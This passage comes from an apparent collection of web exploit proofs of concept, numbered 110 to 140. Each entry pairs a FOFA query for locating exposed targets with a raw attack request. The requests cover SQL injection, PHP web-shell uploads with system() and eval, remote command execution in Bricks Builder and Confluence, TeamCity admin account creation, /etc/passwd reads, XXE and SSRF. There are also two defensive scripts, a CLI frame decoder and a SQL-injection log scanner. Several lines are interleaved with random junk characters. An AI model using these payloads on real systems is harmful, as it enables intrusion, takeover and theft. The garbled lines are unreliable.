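    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
    b"\x00\x00\x00\x05\x02\x00\x03GBK"
    b"\x00\x00\x00\x07\x01\x00\x05en_US"
    b"\x00\x00\x00\x00\x03"
)


def _write_utf(s: str) -> bytes:
    """Java DataOutputStream.writeUTF: 2-byte big-endian length + UTF-8 (identical for ASCII)."""
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def encode_frames(frames) -> bytes:
    """Build an upload-side body from (op, argument) pairs.

    Each frame is: int32 length of the payload (the op byte is not counted),
    one op byte, then the payload; START carries no payload.
    """
    out = bytearray()
    for op, arg in frames:
        payload = b"" if arg is None else _write_utf(arg)
        out += struct.pack(">I", len(payload)) + bytes([OPS[op]]) + payload
    return bytes(out)


def decode_frames(body: bytes):
    """Parse a captured upload body back into (op, argument) pairs."""
    frames, pos = [], 0
    while pos + 5 <= len(body):
        (length,) = struct.unpack_from(">I", body, pos)
        op = OP_NAMES.get(body[pos + 4], "UNKNOWN(%d)" % body[pos + 4])
        payload = body[pos + 5:pos + 5 + length]
        arg = None
        if len(payload) >= 2:
            (n,) = struct.unpack_from(">H", payload, 0)
            arg = payload[2:2 + n].decode("utf-8", "replace")
        frames.append((op, arg))
        pos += 5 + length
    return frames


def file_read_args(body: bytes):
    """Return ARG values that args4j treats as @file expansions (the CVE-2024-23897 trigger)."""
    return [a for op, a in decode_frames(body) if op == "ARG" and a and a.startswith("@")]


if __name__ == "__main__":
    for op, arg in decode_frames(POC_BODY):
        print(op, repr(arg))
    print("file-read arguments:", file_read_args(POC_BODY))
```

For detection, the useful signal is any ARG frame whose string starts with `@` on a `Side: upload` request to /cli: legitimate CLI clients almost never pass response files, and the first frame being `help`, `connect-node` or another command that echoes its arguments back is the tell for the read-via-error-message variant shown above.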
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA: body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA: "wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA: body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

) n  T" p5 s  E9 l7 j! k) r113. WordPress Automatic 插件任意文件下载和SSRF
! |$ @6 I& Q8 N# @CVE-2024-27954
! O4 a+ k; J( W4 A$ G% w2 xFOFA:"/wp-content/plugins/wp-automatic"9 i6 [9 y. _1 P$ T+ ~* q* I
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1  A: e7 ^1 B- o9 g. K' C
Host: x.x.x.x7 g& U) N4 a$ H3 V$ y
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
# ~1 k/ _* M: k- j9 n7 _/ M  rConnection: close6 }$ j" v- |; @3 C4 v2 j; u
Accept: */*' E+ ?6 w: e' A/ Y9 e" I" d6 @% A8 B) W
Accept-Language: en# M3 s  o4 o0 j3 U. G  ?
Accept-Encoding: gzip# B; Q% @# K  s  N$ x

* {) G. U( @( g, }: c8 s5 u; @2 ~6 C2 k
114. WordPress MasterStudy LMS plugin SQL injection
FOFA: body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce from the front page.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket plugin file upload
FOFA: body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA: body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Byzoro (北京百绰智能) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA: title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field controls where the file is written; then request /home/src.php.

119. Byzoro (北京百绰智能) Smart S20 management platform sysmanageajax.php SQL injection (authenticated)
CVE-2024-1254
FOFA: title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

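Several of the injections above put the SQL somewhere a value-only scanner does not look: in the parameter name itself (SpringBlade 106 and 107) or in a bracketed PHP array key such as id[where] (LayerSlider 117), alongside the ordinary value injections (HTML5 Video Player 111). The Python below is an added example, not part of the original post: it replays those request lines as constructed access-log entries and inspects both parameter names and values after percent-decoding. The pattern list is this example's own and deliberately short; treat it as a triage aid for log review, not as a WAF rule set.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined log format) replaying the request lines of the
# SpringBlade (106), LayerSlider (117) and HTML5 Video Player (111) POCs, plus two benign hits.
LOG_LINES = [
    '10.0.0.5 - - [01/Mar/2024:10:00:01 +0800] "GET /api/blade-system/dict-biz/list'
    '?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 312',
    '10.0.0.5 - - [01/Mar/2024:10:00:02 +0800] "GET /wp-admin/admin-ajax.php'
    '?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Mar/2024:10:00:09 +0800] "GET /?rest_route=/h5vp/v1/view/1'
    '&id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 48',
    '10.0.0.7 - - [01/Mar/2024:10:00:10 +0800] "GET /api/blade-system/dict-biz/list?code=sex&size=10 HTTP/1.1" 200 1201',
    '10.0.0.7 - - [01/Mar/2024:10:00:11 +0800] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=7 HTTP/1.1" 200 4410',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Heuristic signatures (this example's own), applied to decoded names and values alike.
SQLI_PATTERNS = [
    ("sql-function", re.compile(r"\b(?:updatexml|extractvalue|sleep|benchmark|load_file)\s*\(", re.I)),
    ("subselect", re.compile(r"\(\s*select\b", re.I)),
    ("union-select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("comment-tail", re.compile(r"--\s|/\*")),
]


def query_pairs(target: str):
    """Yield (name, value) pairs of the query string, percent-decoded, names included."""
    for part in urlsplit(target).query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def classify(text: str):
    """Names of every signature that fires on one decoded token."""
    return [label for label, rx in SQLI_PATTERNS if rx.search(text)]


def scan_log(lines):
    """One finding per suspicious parameter; 'where' says whether the name or the value fired."""
    findings = []
    for lineno, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        path = urlsplit(target).path
        for name, value in query_pairs(target):
            for where, token in (("name", name), ("value", value)):
                hits = classify(token)
                if hits:
                    findings.append({"line": lineno, "path": path, "param": name,
                                     "where": where, "patterns": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f)
```

The SpringBlade line only fires on the parameter *name*; a scanner that runs its regexes over values (or over parse_qs output keyed by name without inspecting the keys) reports nothing for it. Double percent-encoding and request bodies are out of scope here and would need a second decode pass and the POST payload respectively.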
120. Byzoro (北京百绰智能) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA: title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

The uploaded file is written to /upload/2.php.

121. Beijing Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

Uploaded file path: boot/web/upload/weblogo/1.php

6 L! P) j4 Q( |" O122. 北京百绰智能s200管理平台/importexport.php sql注入! E( R1 u1 G. u3 E- m
CVE-2024-27718FOFA:title="Smart管理平台"
; D' z8 G+ R% d9 Y8 z其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
7 o6 z5 u+ L& _7 P* H" UGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
1 Q& Q5 O5 C; I4 n$ hHost: x.x.x.x
4 m& y4 ~+ q& P4 T- hCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
1 ~# N1 d# i/ B( a( k  U7 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0  e' }" G: u' m8 A) h1 h9 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, }% c' j9 |6 A7 D+ e/ I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* f  e8 ~6 G  G7 |$ n
Accept-Encoding: gzip, deflate, br
/ J0 L% H0 y7 @: JUpgrade-Insecure-Requests: 1* B9 t" L9 |9 ]3 G9 ?/ T% I+ ]) \3 j3 ~
Sec-Fetch-Dest: document) a/ r' \7 X8 v  H6 v# n/ ?$ D7 l/ d- Z
Sec-Fetch-Mode: navigate9 @9 d! s3 `" V# {2 X) a
Sec-Fetch-Site: none+ S9 R! D$ H0 R0 a: j& b  H
Sec-Fetch-User: ?1
, X6 v! t1 b: f1 DTe: trailers
- }% y$ Z, X2 s/ |5 qConnection: close% ~2 a5 z" `' W9 u
: C; T& F# h! T6 e3 Q. y: P6 V% l
+ I. o0 T8 }2 K# Q* r
123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The command output is returned in the X-Cmd-Response response header.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the management console with it; the console allows system commands to be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

The external entity is resolved out-of-band; a DNS hit on the dnslog domain confirms the parser fetched it.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 and earlier, 2021u7 and earlier, 2023u1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, passing the uuid from step 1 in a request header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
Time-based blind injection through the orderBy parameter:
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199 (path traversal to otherwise protected pages):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
